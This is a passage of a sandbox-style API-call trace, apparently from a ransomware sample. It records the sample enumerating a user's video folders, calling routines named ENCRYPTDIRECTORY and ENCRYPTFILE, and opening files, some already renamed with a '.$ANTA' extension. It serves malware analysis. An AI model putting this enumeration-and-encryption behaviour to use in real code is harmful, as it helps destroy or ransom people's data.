ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xb6f0, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="IQ0I29Q qVTPWYuVmY.avi.$ANTA", cAlternateFileName="IQ0I29~1.$AN")) returned 1 [0103.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0103.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0103.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0103.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0103.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0103.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0103.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0103.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0103.188] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0103.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0103.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0103.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0103.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0103.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.188] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0103.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0103.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0103.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0103.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0103.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0103.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0103.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0103.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0103.189] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0103.189] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0103.189] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x944575a, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x944575a, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x95365e2, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x5fe0, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="s4MXeg0Vr.avi.$ANTA", cAlternateFileName="S4MXEG~1.$AN")) returned 1 [0103.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0103.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0103.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0103.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ea8 | out: hHeap=0x1780000) returned 1 [0103.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0103.189] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0103.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.189] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0103.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0103.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0103.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0103.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0103.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0103.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0103.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0103.189] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.189] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0103.189] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x965b866, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x965b866, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x990a38d, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xc2a0, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="yxs3r3.mp4.$ANTA", cAlternateFileName="YXS3R3~1.$AN")) returned 1 [0103.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0103.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0103.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0103.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0103.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0103.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0103.190] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0103.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0103.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.190] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0103.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0103.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0103.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0103.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0103.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0103.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0103.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0103.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0103.190] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.190] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0103.190] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e28d0, ftCreationTime.dwHighDateTime=0x144e8e8, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e28d0, ftLastWriteTime.dwLowDateTime=0x43ea730, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="", cAlternateFileName="øнńဓ+\x10")) returned 0 [0103.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0103.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0103.191] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0103.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0103.191] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0103.191] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0103.191] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca")) returned 0x10 [0103.191] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\*", lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ba5f170, ftCreationTime.dwHighDateTime=0x1d5e1c0, ftLastAccessTime.dwLowDateTime=0xad79bf20, ftLastAccessTime.dwHighDateTime=0x1d5e96a, ftLastWriteTime.dwLowDateTime=0xad79bf20, ftLastWriteTime.dwHighDateTime=0x1d5e96a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca538, cFileName=".", cAlternateFileName="")) returned 0x41ac500 [0103.191] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ba5f170, ftCreationTime.dwHighDateTime=0x1d5e1c0, ftLastAccessTime.dwLowDateTime=0xad79bf20, ftLastAccessTime.dwHighDateTime=0x1d5e96a, ftLastWriteTime.dwLowDateTime=0xad79bf20, ftLastWriteTime.dwHighDateTime=0x1d5e96a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca538, cFileName="..", cAlternateFileName="")) returned 1 [0103.191] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x981f43e0, ftCreationTime.dwHighDateTime=0x1d5ee5e, ftLastAccessTime.dwLowDateTime=0xf6d94300, ftLastAccessTime.dwHighDateTime=0x1d5ed5e, ftLastWriteTime.dwLowDateTime=0xf6d94300, ftLastWriteTime.dwHighDateTime=0x1d5ed5e, nFileSizeHigh=0x0, nFileSizeLow=0x5d3, dwReserved0=0x0, dwReserved1=0x43ca538, cFileName="333uErW2SJ.avi", cAlternateFileName="333UER~1.AVI")) returned 1 [0103.191] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd59e5170, ftCreationTime.dwHighDateTime=0x1d5e54e, ftLastAccessTime.dwLowDateTime=0x3b529e30, ftLastAccessTime.dwHighDateTime=0x1d5e58c, ftLastWriteTime.dwLowDateTime=0x3b529e30, ftLastWriteTime.dwHighDateTime=0x1d5e58c, nFileSizeHigh=0x0, nFileSizeLow=0xbcb7, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="c1tN0jRrSKz9_ 3.mkv", cAlternateFileName="C1TN0J~1.MKV")) returned 1 [0103.191] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4e81fc0, ftCreationTime.dwHighDateTime=0x1d5eb4d, ftLastAccessTime.dwLowDateTime=0xc760ef40, ftLastAccessTime.dwHighDateTime=0x1d5e1d5, ftLastWriteTime.dwLowDateTime=0xc760ef40, ftLastWriteTime.dwHighDateTime=0x1d5e1d5, nFileSizeHigh=0x0, nFileSizeLow=0x18cfb, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="WfuP9I.swf", cAlternateFileName="")) returned 1 [0103.192] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x788f5c40, ftCreationTime.dwHighDateTime=0x1d5e206, ftLastAccessTime.dwLowDateTime=0x89ee8070, ftLastAccessTime.dwHighDateTime=0x1d5f0ba, ftLastWriteTime.dwLowDateTime=0x89ee8070, ftLastWriteTime.dwHighDateTime=0x1d5f0ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="yyOweBt9y9iUOOrJX", cAlternateFileName="YYOWEB~1")) returned 1 [0103.192] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb73f020, ftCreationTime.dwHighDateTime=0x1d5ef00, ftLastAccessTime.dwLowDateTime=0xaa0bc220, ftLastAccessTime.dwHighDateTime=0x1d5eb86, ftLastWriteTime.dwLowDateTime=0xaa0bc220, ftLastWriteTime.dwHighDateTime=0x1d5eb86, nFileSizeHigh=0x0, nFileSizeLow=0xcb31, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="yzzjzdDz73JlAs1uEFCr.avi", cAlternateFileName="YZZJZD~1.AVI")) returned 1 [0103.192] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e2800, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0x7, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c3570, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="¨нńဓ+\x10")) returned 0 [0103.192] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0103.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|333uErW2SJ.avi|c1tN0jRrSKz9_ 3.mkv|WfuP9I.swf|yzzjzdDz73JlAs1uEFCr.avi", cchCount1=71, lpString2="", cchCount2=0) returned 3 [0103.192] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0103.192] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\333uErW2SJ.avi", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x981f43e0, ftCreationTime.dwHighDateTime=0x1d5ee5e, ftLastAccessTime.dwLowDateTime=0xf6d94300, ftLastAccessTime.dwHighDateTime=0x1d5ed5e, ftLastWriteTime.dwLowDateTime=0xf6d94300, ftLastWriteTime.dwHighDateTime=0x1d5ed5e, nFileSizeHigh=0x0, nFileSizeLow=0x5d3, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="333uErW2SJ.avi", cAlternateFileName="333UER~1.AVI")) returned 0x41ac700 [0103.192] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0103.192] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0103.192] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0103.192] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0103.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0103.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca850, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0103.193] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\333uErW2SJ.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\333uerw2sj.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0103.193] FreeLibrary (hLibModule=0x772d0000) returned 1 [0103.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0103.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0103.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0103.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0103.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0103.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0103.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0103.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0103.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0103.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0103.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0103.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0103.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0103.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0103.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0103.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0103.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0103.194] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0103.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0103.194] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0103.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0103.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0103.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0103.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0103.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0103.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0103.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0103.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0103.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0103.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0103.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0103.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0103.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0103.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0103.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0103.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0103.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0103.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0103.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0103.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0103.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0103.195] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0103.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0103.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0103.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0103.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0103.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0103.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0103.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0103.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0103.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0103.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0103.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0103.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0103.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0103.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0103.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: 